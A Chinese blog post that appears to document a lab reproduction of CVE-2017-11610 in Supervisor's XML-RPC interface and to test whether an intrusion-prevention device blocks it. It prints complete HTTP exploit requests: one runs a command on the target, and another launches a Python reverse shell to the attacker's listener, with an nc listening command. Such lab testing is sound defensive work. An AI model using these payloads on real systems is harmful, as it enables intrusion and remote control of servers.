入侵防御漏洞复现(三)

已于 2024-01-19 13:41:08 修改
阅读量423 收藏 9
点赞数 9
分类专栏: 漏洞复现 文章标签: web安全
于 2024-01-19 12:26:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szdx1043/article/details/135692179
版权

一、CVE-2017-11610 Supervisor XML-RPC认证用户远程代码执行漏洞——漏洞攻击

1.简介

Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。以下版本受到影响:supervisor 3.0.1之前的版本,3.1.4之前的3.1.x版本,3.2.4之前的3.2.x版本,3.3.3之前的3.3.x版本。

2.vulfocus搭建靶场

下面截图图中访问地址实际和端口使192.168.20.240:26789

3.攻击源构造burpsuite报文

访问192.168.20.240:26789, burpsuite拦截报文内容后,发送到repeater, 构造包含supervisor.supervisord.options.warnings.linecache.os.system的如下报文发送,发送成功后,靶机上会自动在/tmp目录下生成success文件

POST /RPC2 HTTP/1.1
Host: 192.168.20.240:26789
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 215

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

4.攻击成功

靶机上生成success文件

5.测试DUT防护

DUT 开启防护功能后,发送攻击报文失败,DUT产生告警日志

二、反弹shell攻击——利用CVE-2017-11610 

1.简介

反弹shell就是一种入侵行为,主要表现为本地主机主动连接远端的攻击者,这样远端攻击者会获得本地主机的执行环境,拥有所有权限,可以任意执行命令,如图2所示。

2.volfocus 搭建靶场

靶场与上面的一样,重新启动后,端口号实际变成了11967,忽略下面截图中的端口号

3.攻击源动作

攻击源使用kali系统,先使用nc -lvp 9999监听9999端口,然后burpsuite构造报文发送到靶机

POST /RPC2 HTTP/1.1
Host: 192.168.20.240:11967
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/xml
Content-Type: text/xml
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Length: 639

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.execve</methodName>
<params>
<param>
<string>/usr/bin/python</string>
</param>
<param>
<array>
<data>
<value><string>python</string></value>
<value><string>-c</string></value>
<value><string>import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.3",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);</string></value>
</data>
</array>
</param>
<param>
<struct>
</struct>
</param>
</params>
</methodCall>

4.攻击成功

发送后,成功反弹shell到攻击源,此时攻击源可以访问靶机shell,获取/etc/passwd等信息

5.测试DUT防护

DUT开启反弹shell防护,当靶机shell反弹到攻击源后,检测到有命令输入时,会重置链接,使链接断开,并产生告警日志

6.遇到的问题

反弹后,如果攻击源退出靶机shell,burpsuite 再次发送同样的攻击报文无法触发shell反弹,发现192.168.20.240:11967也无法访问,链接被重置。

此时停止/重新启动靶机,再次同样的步骤可以成功触发反弹shell。

szdx1043
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Supervisord 远程命令执行漏洞(CVE-2017-11610)
limb0的博客
07-05 4362
Supervisord 远程命令执行漏洞(CVE-2017-11610) 一、漏洞介绍 Supervisord是一款用Python语言开发的管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 Supervisord曾曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610)。通过POST请求向Supervisord管理界面提交恶意数据,可以获取服务器操作权限,带来严重的安全风险。 利用条件: Supervisor版本在受影响范围内 Supervisor 9001管理端口可以被外网访问
解决kali使用docker部署 volfocus靶场,镜像管理一键同步提示”服务器内部错误,请联系管理员“问题。
最新发布
corvus_yun的博客
05-31 387
怀疑docker拉取的vulfocus:latest镜像不是最新的版本。如果提示该镜像正在被某容器使用可以强制删除该容器。到这里就差不多完成了,启动容器即可。拉取成功后可删除原安装的镜像。
Supervisord 远程代码执行漏洞(CVE-2017-11610)漏洞
OKAY_TC的博客
04-22 3887
视频链接:https://www.ichunqiu.com/course/58895 如下内容为及笔记 Supervisord 远程代码执行漏洞(CVE-2017-11610)漏洞 0x01 漏洞信息 Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进...
远程桌面漏洞poc_Supervisord 远程代码执行漏洞(CVE201711610)漏洞
weixin_39730263的博客
12-10 147
漏洞信息Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进程状态的功能,在进程异常退出时能够自动重启进程。Supervisord在配置了Web接口后,服务器会启动一个XMLRPC服务器,端口号为9001,利用本漏洞,在获取接口访问权限后,远程攻击者可利用发送一段...
飞秋漏洞工具
07-09
5. **防御策略**:根据发漏洞,提出防御建议,例如更新到最新版本的飞秋、使用防火墙阻止恶意流量、部署入侵检测系统等。 6. **教育和培训**:向用户和管理员普及网络安全知识,提高他们识别和防范网络攻击的...
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
这暗示了这个工具可能是黑客或安全研究人员用来测试系统安全性的,或者是教育目的,以便于了解漏洞的工作原理和防御措施。 【标签解析】 标签“dz漏洞”、“dz7.1”、“dz7.2”进一步明确了讨论的主题,即与Discuz!...
WX 0day上线CS.rar
04-21
3、**对应版本wx安装包**:这可能是一个含有特定漏洞的WX软件版本,攻击者可能利用这个版本中的0day漏洞入侵系统。安全研究人员可以使用这个版本来重攻击场景,以验证漏洞的存在并开发防御策略。 【标签】"wx 0...
CVE-2022-28525文档(巨详细,零基础
10-14
七、漏洞防御 为了防御 CVE-2022-28525 漏洞,服务器管理员应该采取以下措施: * 及时更新服务器软件和组件 * 正确地验证用户输入 * 限制上传文件的类型和大小 * 使用防火墙和入侵检测系统 本文档详细介绍了 CVE-...
Supervisord远程命令执行漏洞分析(CVE-2017-11610)
zzkk_的博客
08-10 5568
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。 Supervisor介绍 Supervisor 是基于 Pyt
Vulhub Supervisord 远程命令执行漏洞
weixin_53696027的博客
06-07 261
Vulhub Supervisord 远程命令执行漏洞
python supervisord 远程命令执行漏洞(CVE-2017-11610)
whatday的专栏
06-27 750
Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 我觉得它相比Systemd有几个特点: 配置比较简单 一个简单的第三方应用,与系统没有耦合 提供HTTP API,支持远程操作 所以,我之前把他用来跑一些Web应用。 Supervisord的架构分为Server和Client,Server以一个服务的形式,跑在系统后台,而Client是一个命令行工具,其实就是根据用户的要求,调用Server提供的A
supervisor入门到精通
weixin_30662011的博客
12-27 181
1.介绍 Supervisor是基于 Python 的进程管理工具,只能运行在 Unix-Like 的系统上,也就是无法运行在 Windows 上。Supervisor 官方版目前只能运行在 Python 2.4 以上版本,但是还无法运行在 Python 3 上,不过已经有一个 Python 3 的移植版supervisor-py3k。 在一个分布式环境中,每台机器上可能需要启动和停止多个...
Tomcat (CVE-2017-12615)远程代码执行漏洞利用
小白鸽
07-31 539
01 背景介绍 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。 02 影响版本 Apache Tomcat 7.0.0 – 7.0.81 03 利用方式 把请求方式改为PUT请求,上传POC <%@ page language=
Supervisord RCE(CVE-2017-11610)
夜幕下的灯火阑珊的博客
07-20 74
打开是这个页面 直接发送如下数据包 POST /RPC2 HTTP/1.1 Host: 192.168.134.132:9001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,app...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值